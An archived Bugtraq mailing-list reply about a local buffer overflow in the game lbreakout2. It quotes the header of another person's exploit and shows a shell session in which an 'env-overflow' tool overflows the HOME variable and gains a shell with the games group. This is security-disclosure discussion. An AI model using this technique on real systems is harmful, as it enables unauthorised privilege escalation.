Re: lbreakout2 < 2.4beta-2 local exploit

To: Li0n7@xxxxxxxx
Subject: Re: lbreakout2 < 2.4beta-2 local exploit
From: Steve Kemp <steve@xxxxxxxxxxxx>
Date: Mon, 23 Feb 2004 20:26:03 +0000
Cc: bugtraq@xxxxxxxxxxxxxxxxx
In-reply-to: <20040222134545.15854.qmail@xxxxxxxxxxxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
References: <20040222134545.15854.qmail@xxxxxxxxxxxxxxxxxxxxx>
User-agent: Mutt/1.3.28i

On Sun, Feb 22, 2004 at 01:45:45PM -0000, Li0n7@xxxxxxxx wrote:

> /* 
>  * lbreakout2 < 2.4beta-2 local exploit by Li0n7@xxxxxxxx
>  * vulnerability reported by Ulf Harnhammar 
> <Ulf.Harnhammar.9485@xxxxxxxxxxxxx>
>  * usage: ./lbreakout2-exp [-r <RET>][-b [-s <STARTING_RET>]]
>  *
>  */

    I much prefer mine ;)

    Using the `env-overflow` tool this may be exploited without
   the need for a valid X11 display - ie.  ssh/telnet access
   sufficient - or any explicit coding:

   skx@uml:~$ ./env-overflow /usr/games/lbreakout2 1084 HOME
   ... snip ...
   sh-2.05a$
   sh-2.05a$ id
   uid=1000(skx) gid=100(users) egid=60(games) groups=100(users)

   Where env-overflow lives here:

        http://www.steve.org.uk/Hacks/generic.html

Steve
--
# Debian Security Audit Project
http://www.shellcode.org/Audit/

References:
- lbreakout2 < 2.4beta-2 local exploit
  - From: Li0n7

Prev by Date: Web Crossing 4.x/5.x Denial of Service Vulnerability (FIX)
Next by Date: Re: Windows XP explorer.exe heap overflow.
Previous by thread: lbreakout2 < 2.4beta-2 local exploit
Next by thread: [SECURITY] [DSA 445-1] New lbreakout2 packages fix buffer overflow
Index(es):
- Date
- Thread